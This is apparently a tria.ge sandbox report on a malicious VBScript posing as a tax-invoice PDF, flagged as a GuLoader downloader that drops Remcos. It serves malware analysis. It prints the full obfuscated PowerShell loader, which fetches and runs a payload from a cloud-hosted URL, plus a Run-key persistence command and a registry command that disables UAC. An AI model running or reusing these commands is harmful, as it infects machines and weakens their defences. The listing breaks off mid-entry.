Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

NTS_eTaxIn...df.vbs

windows7-x64

10

NTS_eTaxIn...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    181s
  • max time network
    279s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/03/2024, 23:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NTS_eTaxInvoice·pdf.vbs

  • Size

    22KB

  • MD5

    44351f5b633f64c785a5cb681f54db24

  • SHA1

    72b14e85f0676ef6829937060fea448753c357b5

  • SHA256

    680acae485ed1f4a3ac87a63eb7b640f15019e6feb43664654c3f6c0ab4cc118

  • SHA512

    a26ff7a5faa522222a551bac2ac973135651aeb81bc4500ee18cab6c6b1f5a65f598bb7b8a8e244e03bdbfd42c34e534e6dd3cb882cf302c7afecd74be430be4

  • SSDEEP

    384:CE686K1TZNiwsye6fUoQvHjNTvDDzgN9g8gT:H686KZHipf6sFxDD3ke8M

Score
10/10
guloaderdownloaderevasionpersistencetrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NTS_eTaxInvoice·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Flossflower Circuitman Sawmill Uhaandgribeligheds Topologically #>;$Skatteberegningernes=(cmd /c set /A 115^^0);Function Ditmarskers ([String]$Temperamenters){$Skatteberegningernes=[char][int]$Skatteberegningernes;$Kaklen=$Skatteberegningernes+'ubstring';$Laasningens=8;$Hjemstavnsdigtninger=Agterpartierne($Temperamenters);For($Eskadrechef=7; $Eskadrechef -lt $Hjemstavnsdigtninger; $Eskadrechef+=$Laasningens){$Byplanlggere=$Temperamenters.$Kaklen.Invoke($Eskadrechef, 1);$Fugleungerne=$Fugleungerne+$Byplanlggere;}$Fugleungerne;}function Cacolike ($Industrialismes){. ($Hynes) ($Industrialismes);}function Agterpartierne ([String]$Omniproduction){$Forsorgspdagoger=$Omniproduction.Length-1;$Forsorgspdagoger;}$Osmaterium=Ditmarskers 'OrientaTLandsskr SecablaFrdselsnDescants Brod ef BrahmieNeutr,lr PakninrPotentiiVerandanQuistiogT.eurgi ';$Eftersprgselspressene=Ditmarskers 'DetachehSubcrentBoblekatVar.atipUnsolicsPalfrey:Eu,asia/,agneto/Tr nsfedlatr,birTilbereiMuslimsvMonarcheK.bikme.KampduegSiccatio Stormio Kratogg GroundlKundetje Angios.Col,inscAgitereo CalentmEpiscop/BiankaruYngsteecBestaar? oplukkeInnascixImperiapInfrateoProduktrRadiocht Ritual=PericaedOriginaoTrk.lasw.traamnnHauranilFl,tiero Bofor aUnfratedAdvokat&KonfereiEnregi dKanalfo=Cirkled1BoudoirhJenkrogwCad coum Ancill_,azedlywAge daetrammeprvKokas,ew Om,iviv RapproXSt.gfar2Flgevi.6 Skrige1 ChewelDCh.ngseGCerutte2 TrettePh.pogynwCleidarIDkspladtKalk osdMinat,rGPhrenolSMalax ej.arselsjFolkekiwVo,chsaz GuldbojSoil.re5Rangoonq Mil,trwBegrdel1Ectopis ';$Hynes=Ditmarskers 'GlimtviiR amalgeindsttexLaaarsb ';$Godlessness=Ditmarskers 'Genfrem$MutagengBlousonlBlindbloUdstdnibRea itea Mot,rilLu,tlyo: OphjlpDUdstedegEk.otisnExp,aini BitersnAdmonissSurdimutE,patriiKonsumft RedaktuIntromitOksehudi Te.orioMonoximnForsatteAstenisn.nodise Enevrel=Slankek flyttelSPsychodtC.raguaaScissorrGiftingtExtorte-TankbaaBSki.leri Eigh.vtSquirars MordenTUddeligr Dela ta Ikldennbiggssts Pen.eafInsols.e Knleddr.ronolo Kontra -DiffereSGh,ttoioUniversuRa delir RatebecKukkelueKaktusp unione$Br ggekEDeathlifWringintLam llee D,ellirLutredes Cobhoup Nonmarr Kontrags,rnendsIrr.tioeHa,merel RyokansEcla repUnworthr StyrkeeInsoulisChelseasLobulose Propo,nmoleskieThorax, Regnomr-Vel enoDDrenesveReprivasNotebo.tfodtudsiRioj srnB bliota,ynkrontGoddizeiBefolknoKastebonUbet.de Malinge$reellesBVen,sonlsyvarmeeTerraripSek.erehHanrejeaS andarrLg.andeo Spr utpBilledrhVacoaafrslinkedyEnterodpTruckfrl Extrava uhand,sFeltspetReinocuyMonoeth ';Cacolike (Ditmarskers 'Aflyste$Rekognog BethwilDorsicoo BaghovbPi,kberaMadkasslPseudox:RigiditBTotherhl Amphore DiscolpHoldin hOpbevaraTopsejlr SengeboInds.vnpGakfrash ikaryrT,llidsy VrikkepKurdsrolIstningaSlutopgsSikkerhtIntensiy Pot,oy=Kermess$M.tigsteTrlbindnSt.ldbav Hastem: BrosteaNo,dbrap AnstilpKilolitdW.dowliaFred,gstStudentaNonposs ') ;Cacolike (Ditmarskers 'PolypagITrygonim.ulturhp Male,iocneorumr PindentUdtagel-doriesdMM harshoUdsanerdProto.huFilmcenl CellsteTropikf OillesBReaffiriVuggegatMellemmsDisabi.TFa makorelitekua MatrimnKvllerssS,agterfO.kastnevulvar rPe iton ') ;$Blepharophryplasty=$Blepharophryplasty+'\Effektiviteten.Ele' ;Cacolike (Ditmarskers 'Passi.e$VraltedgOrientelSubclano F.kultbViceforaBidragslCoh.bat:VaesentPUnseculaCalamitnTorvetoe kresteuGenp rtr AnpartoSphacelpKrukkeriFonterms DrmmeukDrmmeageBodonid1Situati1 Ed,mun8 Cathol= Forsb (.urabilTHomogeneMadothesIntermitP,ngepo- Lanya PMilitsea Opsttet EndevahSjoskes Salonf$Ocea.icBUfo,stallapstreeKard,napautocamhA,talenaUnderscr Flotilo ForgrepGenspejhFjernstrMiltoniy DeoxidpUniverslTuredexaLastenssSmaaordtDetermiy midtpa)Byrende ') ;while (-not $Paneuropiske118) {Cacolike (Ditmarskers ' SwigsgIKookrisf.amstem S lgsa(Ophrsud$ KrampeDOffsettgRegasssnOp,eklaiLuksus,nRydningsSpr.deltd rektoi Kirurgt FredchufriskpitNunc esiBearberoEfteraandeltidieP,oppernOndskab.FljdrenJQuartato Ad essbStilhedS,ibliottRes ootaVallisntAnthraceM,derni Astrolo-DreamboeDicrotoqIldsted Riveb $TilsprgOAf isersDa,cysamNonprocaElektritDelen,reOverelar CuticuiCror,spu Amethym,ndhold)cu.toms Forhae {Chinb nSUvrdightSektoreaMahjongrPr secttbr,ndys- dmarchSkolon elSt ftspeOrderlyeBefstn p skjort Indrmme1 Salgsj}Liderlie BesejllFalkejasB,folkeeDdemand{ Z.beleS cubetjtPawns oaKugleflrCy lametGulistl-Angulo,SUnderw l FruggaeUncribgeScytitipSvejtse Samens1Avide,c; IndhftCCusi ejaRamlerec BrnefloRepolymlTuplepriAgendumk Alge.reKabinet .ubven$U,histoGGnomicnoPoniarddDdedagslLsebrile Forsvas contr s SeabagnMikrobiePerikons Charons Umbren} Catama ');Cacolike (Ditmarskers 'Mikk.de$Mi.behag Sko,emlStr kiloMestizobCushatkaTvesprolTegllag:Ca,llekPToem,gla Supernn FremlyeSeamanluRe.torerS.berifoPrecogipreel,cti ExpostsTjenestkFletdokePangram1Tumlepl1Anlgs.d8A timon=Scoterh( umenneTUnprofue Forsk,sUdgiveltPrrnatl-Meste,nPKrmmerhaadsmitht F,dbolh Suvern Endsi.e$a,kiverB paddaklOmstdele burgeepJudaskyhF.rtiliaHeathbrrCoshed oU,stillpYaghourhPallidirMyriadey ,lovsypKru tprlAstrogeaSteatocsDimmingtVsentliy Fdeva )Unlucid ') ;}Cacolike (Ditmarskers '.uggere$Aecial.gSpilledlPrerecoo oetizeb Pa hfiaShorthalCocoroo:AdminisB Lorgneu Beslagl Ethn.llanalyseeMisprodtVoidneslSquaddyeVanligesBu getesVarmetp Precul=Covertl HexastyGsultaneeSteamertBrandd -Em etraCKnewbomoBouillon PrketjtR,valide,lectopnCeylonet.undten tusinde$Spurpr,B BiskoplCatechieUn ervuphabsburhArkitekaSgerumarPsychomoSmrehulpStempe hSphexpor,hynchoy CaquetpEndiviel Stli,sa Cam,ussKlampentToxophoyGrundst ');Cacolike (Ditmarskers 'Guep rd$lughdoag,idwintlLangsomo OpryknbDiplomsaoccipitlPantomi: Tilto,L H.ppigoTounatecTyksakkkP,chyrhoTipb,rtuAf.ranctRegionpe Trow,drLsen es jantedo=Spid.hu Ekspedi[Arb,jdsS ,halasyUgebladsdiskvaltAlkefuge PylredmThanato. S.ibinCBadevano AasyngnModem.ivKleiniteNoncanorPodop.ttSammen,]Mi fors:Cigarha: ivetteFSun.tterSole,ogobanestrmR defogBSvarb ea R.nrins Rekorde Bjergr6ridsenm4Beryll.S Overl,tDestillrTribunei,atoctinSpi,lebg Aalert(Apot op$TranholBAnfgtedu Nonpo,lKomb nelImmunofeDrawboltTheologlRedi,coeAttermis Dignins hakerd) Fe ton ');Cacolike (Ditmarskers 'Preedit$Laoth,lgProofr.lBedriftoProba.ib Tealn.aSerialil nproje:Ud,aevnDEmbarg,yMidshipgBlnd,aatDrengeaiIdtbdragStatussgRekursarPh,tolaewiggismsUndfang Skibs.a= Pr mov Cra.ene[GuldaldSLubespoyLit erasBestyretdesillueStallinmHjlpe.a.DrovybeTRedaktiePostf xxZi.ninvtU.linge. eopoliEUnpraisnO cumencWanyo.ooRegneard Effec.iKlerkennKausalegFr.bble] Bibels:Tylosty:UrohaemAStrafprS pontanCEpigyniILummoxnI Shippa.revieweG Heavy,e SprinttNonapprSHydrofetMosegrur Kard.niUd.ntninMinimumgCoptven(Barende$Dia,ektLHovedsaoTrivalecSi.etbikCrosseroFaguddauChasseutHaandreeSecondirTightro)Blaffed ');Cacolike (Ditmarskers 'Milieut$Sporvogg Turnu.lScleroco NgtendbHudlsttaRecredelFuldkom:AnocathDBurk dsavaabenpdTilriveeClabberlHold.arfOnondagrVarehusiLampro.=Exoenzy$DiscaseD formalyFonduemgBibringtUnvisioi scamlegH.emmesgSaucelerDva,etieVanishes Bo,udd.Ta.insdsSkrmydsuSubspecbFlodbl.sStenhj,tGraabler formbliFlintren FullergRea.ass(Grizela3C,uelti1 Tolkni3 Biogas8Skindbe3canaanp3D.ddles,mortori3.aadfri1Reverse3Klatvis6Gripp e9Undflye)Emfasen ');Cacolike $Dadelfri;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:4484
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Flossflower Circuitman Sawmill Uhaandgribeligheds Topologically #>;$Skatteberegningernes=(cmd /c set /A 115^^0);Function Ditmarskers ([String]$Temperamenters){$Skatteberegningernes=[char][int]$Skatteberegningernes;$Kaklen=$Skatteberegningernes+'ubstring';$Laasningens=8;$Hjemstavnsdigtninger=Agterpartierne($Temperamenters);For($Eskadrechef=7; $Eskadrechef -lt $Hjemstavnsdigtninger; $Eskadrechef+=$Laasningens){$Byplanlggere=$Temperamenters.$Kaklen.Invoke($Eskadrechef, 1);$Fugleungerne=$Fugleungerne+$Byplanlggere;}$Fugleungerne;}function Cacolike ($Industrialismes){. ($Hynes) ($Industrialismes);}function Agterpartierne ([String]$Omniproduction){$Forsorgspdagoger=$Omniproduction.Length-1;$Forsorgspdagoger;}$Osmaterium=Ditmarskers 'OrientaTLandsskr SecablaFrdselsnDescants Brod ef BrahmieNeutr,lr PakninrPotentiiVerandanQuistiogT.eurgi ';$Eftersprgselspressene=Ditmarskers 'DetachehSubcrentBoblekatVar.atipUnsolicsPalfrey:Eu,asia/,agneto/Tr nsfedlatr,birTilbereiMuslimsvMonarcheK.bikme.KampduegSiccatio Stormio Kratogg GroundlKundetje Angios.Col,inscAgitereo CalentmEpiscop/BiankaruYngsteecBestaar? oplukkeInnascixImperiapInfrateoProduktrRadiocht Ritual=PericaedOriginaoTrk.lasw.traamnnHauranilFl,tiero Bofor aUnfratedAdvokat&KonfereiEnregi dKanalfo=Cirkled1BoudoirhJenkrogwCad coum Ancill_,azedlywAge daetrammeprvKokas,ew Om,iviv RapproXSt.gfar2Flgevi.6 Skrige1 ChewelDCh.ngseGCerutte2 TrettePh.pogynwCleidarIDkspladtKalk osdMinat,rGPhrenolSMalax ej.arselsjFolkekiwVo,chsaz GuldbojSoil.re5Rangoonq Mil,trwBegrdel1Ectopis ';$Hynes=Ditmarskers 'GlimtviiR amalgeindsttexLaaarsb ';$Godlessness=Ditmarskers 'Genfrem$MutagengBlousonlBlindbloUdstdnibRea itea Mot,rilLu,tlyo: OphjlpDUdstedegEk.otisnExp,aini BitersnAdmonissSurdimutE,patriiKonsumft RedaktuIntromitOksehudi Te.orioMonoximnForsatteAstenisn.nodise Enevrel=Slankek flyttelSPsychodtC.raguaaScissorrGiftingtExtorte-TankbaaBSki.leri Eigh.vtSquirars MordenTUddeligr Dela ta Ikldennbiggssts Pen.eafInsols.e Knleddr.ronolo Kontra -DiffereSGh,ttoioUniversuRa delir RatebecKukkelueKaktusp unione$Br ggekEDeathlifWringintLam llee D,ellirLutredes Cobhoup Nonmarr Kontrags,rnendsIrr.tioeHa,merel RyokansEcla repUnworthr StyrkeeInsoulisChelseasLobulose Propo,nmoleskieThorax, Regnomr-Vel enoDDrenesveReprivasNotebo.tfodtudsiRioj srnB bliota,ynkrontGoddizeiBefolknoKastebonUbet.de Malinge$reellesBVen,sonlsyvarmeeTerraripSek.erehHanrejeaS andarrLg.andeo Spr utpBilledrhVacoaafrslinkedyEnterodpTruckfrl Extrava uhand,sFeltspetReinocuyMonoeth ';Cacolike (Ditmarskers 'Aflyste$Rekognog BethwilDorsicoo BaghovbPi,kberaMadkasslPseudox:RigiditBTotherhl Amphore DiscolpHoldin hOpbevaraTopsejlr SengeboInds.vnpGakfrash ikaryrT,llidsy VrikkepKurdsrolIstningaSlutopgsSikkerhtIntensiy Pot,oy=Kermess$M.tigsteTrlbindnSt.ldbav Hastem: BrosteaNo,dbrap AnstilpKilolitdW.dowliaFred,gstStudentaNonposs ') ;Cacolike (Ditmarskers 'PolypagITrygonim.ulturhp Male,iocneorumr PindentUdtagel-doriesdMM harshoUdsanerdProto.huFilmcenl CellsteTropikf OillesBReaffiriVuggegatMellemmsDisabi.TFa makorelitekua MatrimnKvllerssS,agterfO.kastnevulvar rPe iton ') ;$Blepharophryplasty=$Blepharophryplasty+'\Effektiviteten.Ele' ;Cacolike (Ditmarskers 'Passi.e$VraltedgOrientelSubclano F.kultbViceforaBidragslCoh.bat:VaesentPUnseculaCalamitnTorvetoe kresteuGenp rtr AnpartoSphacelpKrukkeriFonterms DrmmeukDrmmeageBodonid1Situati1 Ed,mun8 Cathol= Forsb (.urabilTHomogeneMadothesIntermitP,ngepo- Lanya PMilitsea Opsttet EndevahSjoskes Salonf$Ocea.icBUfo,stallapstreeKard,napautocamhA,talenaUnderscr Flotilo ForgrepGenspejhFjernstrMiltoniy DeoxidpUniverslTuredexaLastenssSmaaordtDetermiy midtpa)Byrende ') ;while (-not $Paneuropiske118) {Cacolike (Ditmarskers ' SwigsgIKookrisf.amstem S lgsa(Ophrsud$ KrampeDOffsettgRegasssnOp,eklaiLuksus,nRydningsSpr.deltd rektoi Kirurgt FredchufriskpitNunc esiBearberoEfteraandeltidieP,oppernOndskab.FljdrenJQuartato Ad essbStilhedS,ibliottRes ootaVallisntAnthraceM,derni Astrolo-DreamboeDicrotoqIldsted Riveb $TilsprgOAf isersDa,cysamNonprocaElektritDelen,reOverelar CuticuiCror,spu Amethym,ndhold)cu.toms Forhae {Chinb nSUvrdightSektoreaMahjongrPr secttbr,ndys- dmarchSkolon elSt ftspeOrderlyeBefstn p skjort Indrmme1 Salgsj}Liderlie BesejllFalkejasB,folkeeDdemand{ Z.beleS cubetjtPawns oaKugleflrCy lametGulistl-Angulo,SUnderw l FruggaeUncribgeScytitipSvejtse Samens1Avide,c; IndhftCCusi ejaRamlerec BrnefloRepolymlTuplepriAgendumk Alge.reKabinet .ubven$U,histoGGnomicnoPoniarddDdedagslLsebrile Forsvas contr s SeabagnMikrobiePerikons Charons Umbren} Catama ');Cacolike (Ditmarskers 'Mikk.de$Mi.behag Sko,emlStr kiloMestizobCushatkaTvesprolTegllag:Ca,llekPToem,gla Supernn FremlyeSeamanluRe.torerS.berifoPrecogipreel,cti ExpostsTjenestkFletdokePangram1Tumlepl1Anlgs.d8A timon=Scoterh( umenneTUnprofue Forsk,sUdgiveltPrrnatl-Meste,nPKrmmerhaadsmitht F,dbolh Suvern Endsi.e$a,kiverB paddaklOmstdele burgeepJudaskyhF.rtiliaHeathbrrCoshed oU,stillpYaghourhPallidirMyriadey ,lovsypKru tprlAstrogeaSteatocsDimmingtVsentliy Fdeva )Unlucid ') ;}Cacolike (Ditmarskers '.uggere$Aecial.gSpilledlPrerecoo oetizeb Pa hfiaShorthalCocoroo:AdminisB Lorgneu Beslagl Ethn.llanalyseeMisprodtVoidneslSquaddyeVanligesBu getesVarmetp Precul=Covertl HexastyGsultaneeSteamertBrandd -Em etraCKnewbomoBouillon PrketjtR,valide,lectopnCeylonet.undten tusinde$Spurpr,B BiskoplCatechieUn ervuphabsburhArkitekaSgerumarPsychomoSmrehulpStempe hSphexpor,hynchoy CaquetpEndiviel Stli,sa Cam,ussKlampentToxophoyGrundst ');Cacolike (Ditmarskers 'Guep rd$lughdoag,idwintlLangsomo OpryknbDiplomsaoccipitlPantomi: Tilto,L H.ppigoTounatecTyksakkkP,chyrhoTipb,rtuAf.ranctRegionpe Trow,drLsen es jantedo=Spid.hu Ekspedi[Arb,jdsS ,halasyUgebladsdiskvaltAlkefuge PylredmThanato. S.ibinCBadevano AasyngnModem.ivKleiniteNoncanorPodop.ttSammen,]Mi fors:Cigarha: ivetteFSun.tterSole,ogobanestrmR defogBSvarb ea R.nrins Rekorde Bjergr6ridsenm4Beryll.S Overl,tDestillrTribunei,atoctinSpi,lebg Aalert(Apot op$TranholBAnfgtedu Nonpo,lKomb nelImmunofeDrawboltTheologlRedi,coeAttermis Dignins hakerd) Fe ton ');Cacolike (Ditmarskers 'Preedit$Laoth,lgProofr.lBedriftoProba.ib Tealn.aSerialil nproje:Ud,aevnDEmbarg,yMidshipgBlnd,aatDrengeaiIdtbdragStatussgRekursarPh,tolaewiggismsUndfang Skibs.a= Pr mov Cra.ene[GuldaldSLubespoyLit erasBestyretdesillueStallinmHjlpe.a.DrovybeTRedaktiePostf xxZi.ninvtU.linge. eopoliEUnpraisnO cumencWanyo.ooRegneard Effec.iKlerkennKausalegFr.bble] Bibels:Tylosty:UrohaemAStrafprS pontanCEpigyniILummoxnI Shippa.revieweG Heavy,e SprinttNonapprSHydrofetMosegrur Kard.niUd.ntninMinimumgCoptven(Barende$Dia,ektLHovedsaoTrivalecSi.etbikCrosseroFaguddauChasseutHaandreeSecondirTightro)Blaffed ');Cacolike (Ditmarskers 'Milieut$Sporvogg Turnu.lScleroco NgtendbHudlsttaRecredelFuldkom:AnocathDBurk dsavaabenpdTilriveeClabberlHold.arfOnondagrVarehusiLampro.=Exoenzy$DiscaseD formalyFonduemgBibringtUnvisioi scamlegH.emmesgSaucelerDva,etieVanishes Bo,udd.Ta.insdsSkrmydsuSubspecbFlodbl.sStenhj,tGraabler formbliFlintren FullergRea.ass(Grizela3C,uelti1 Tolkni3 Biogas8Skindbe3canaanp3D.ddles,mortori3.aadfri1Reverse3Klatvis6Gripp e9Undflye)Emfasen ');Cacolike $Dadelfri;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1580
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:3096
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:4428
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Overstresses" /t REG_EXPAND_SZ /d "%Desight% -w 1 $Reverseringerne=(Get-ItemProperty -Path 'HKCU:\Cigarilloer\').Skinnelgningen;%Desight% ($Reverseringerne)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:5088
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Overstresses" /t REG_EXPAND_SZ /d "%Desight% -w 1 $Reverseringerne=(Get-ItemProperty -Path 'HKCU:\Cigarilloer\').Skinnelgningen;%Desight% ($Reverseringerne)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2288
              • C:\Windows\SysWOW64\cmd.exe
                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2024
                • C:\Windows\SysWOW64\reg.exe
                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  6⤵
                  • UAC bypass
                  • Modifies registry key
                  PID:808
              • C:\ProgramData\Remcos\remcos.exe
                "C:\ProgramData\Remcos\remcos.exe"
                5⤵
                • Executes dropped EXE
                • Modifies registry class
                PID:4356
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:2428
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
          1⤵
            PID:4884
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k UnistackSvcGroup
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4492

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\Remcos\remcos.exe
            Filesize

            504KB

            MD5

            251e51e2fedce8bb82763d39d631ef89

            SHA1

            677a3566789d4da5459a1ecd01a297c261a133a2

            SHA256

            2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9

            SHA512

            3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
            Filesize

            5KB

            MD5

            507c2cb4ee9df0c05da3087320f1894d

            SHA1

            ee3cd3dcfecf8a7d734fe80603ddf249d8ac6f94

            SHA256

            cad0fa46628fd495a793c17edaeaf07a55523169f26eae393fd005912e735b4c

            SHA512

            71400db3ce75ce57984367f38d9ba57387c3ddab74411bb839abac401e991fe927619dd9e4f886f9f912131dfdde7b07b6d3d1288df725154b993624660564f0

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
            Filesize

            4KB

            MD5

            32a9cdff4f9101cf8d897ae1980267a6

            SHA1

            e6ad4f717d81e2cf3a583670be52f5b48e9b0c72

            SHA256

            81f5b4b60ebe5e680f06f7ce3c2eab534d6295e10ec980c4c9b84bb4dcd7a05a

            SHA512

            10f2d8ed9734a2389fcc8147566a42a9a548e2a121efed5528f23753fd0e3c549aa9a9976a4307bb7189213409c8147c8797d09707783839504087286b898c5a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
            Filesize

            6KB

            MD5

            da3a41e05a42d4aefe97576598f717a7

            SHA1

            fa45d2f19a3d1bd50d9862e95273df51d6a08484

            SHA256

            53050b78988070483b92b372d9f45d4e74be8fa467878fda1a60406020073bba

            SHA512

            e5eab5424400cfaab28dcc72c4003a017403a4d51034cc538e37ebdcafe83dc330a17af80a50761a46baced24d9adf6c1574c4bae1736b67ae02170c90fb6d2e

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
            Filesize

            911B

            MD5

            7b7e8a51bad20ebb7ef572233d59530c

            SHA1

            51a2eca35a0c23812535e59a6ce39ec1c8810ef8

            SHA256

            7975b042e01af32fffe0ed2f1966165d893a394a948470f0534ca8dbfbf21ad6

            SHA512

            88069e34df285916b24f3eea82012c4c08ac8d1c0a67f196043302daf277ee1ec84f329f7152a0fc6c07d5f8d0f405b33206e1f7ea55bb702c9b637556eae07d

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
            Filesize

            5KB

            MD5

            4cf01bbbc213b8e56e027760b845872c

            SHA1

            206f79182b33561692413dd5d9e23fe3423f711a

            SHA256

            45992968ae4470043e7ba6509825eda038f7f3c2817d48601811316b739edbe8

            SHA512

            94493b95eef632bb67f3805805702ab570f5e6bd19996b0c9f97d15a7622b9fbc1b05da79ef73c8321aefc51c6a1f26694dc12f04908fec494840ed8e5c96d60

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h2rvys2m.ett.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • memory/1508-267-0x000001B8F6F80000-0x000001B8F6F90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1508-291-0x00007FFA63540000-0x00007FFA64001000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1508-269-0x000001B8F6F80000-0x000001B8F6F90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1508-268-0x000001B8F6F80000-0x000001B8F6F90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1508-270-0x000001B8F6F50000-0x000001B8F6F76000-memory.dmp

            Filesize

            152KB

            Download

          • memory/1508-271-0x000001B8F9470000-0x000001B8F9484000-memory.dmp

            Filesize

            80KB

            Download

          • memory/1508-392-0x00007FFA63540000-0x00007FFA64001000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1508-266-0x00007FFA63540000-0x00007FFA64001000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1508-302-0x000001B8F6F80000-0x000001B8F6F90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1508-301-0x000001B8F6F80000-0x000001B8F6F90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1508-265-0x000001B8F6A20000-0x000001B8F6A42000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1508-300-0x000001B8F6F80000-0x000001B8F6F90000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1580-276-0x0000000005370000-0x0000000005392000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1580-277-0x0000000005410000-0x0000000005476000-memory.dmp

            Filesize

            408KB

            Download

          • memory/1580-289-0x0000000006250000-0x000000000626E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/1580-290-0x0000000006290000-0x00000000062DC000-memory.dmp

            Filesize

            304KB

            Download

          • memory/1580-278-0x0000000005AE0000-0x0000000005B46000-memory.dmp

            Filesize

            408KB

            Download

          • memory/1580-292-0x0000000004E70000-0x0000000004E80000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1580-293-0x0000000007AE0000-0x000000000815A000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/1580-294-0x0000000006840000-0x000000000685A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/1580-295-0x0000000007500000-0x0000000007596000-memory.dmp

            Filesize

            600KB

            Download

          • memory/1580-296-0x0000000007490000-0x00000000074B2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1580-297-0x0000000008710000-0x0000000008CB4000-memory.dmp

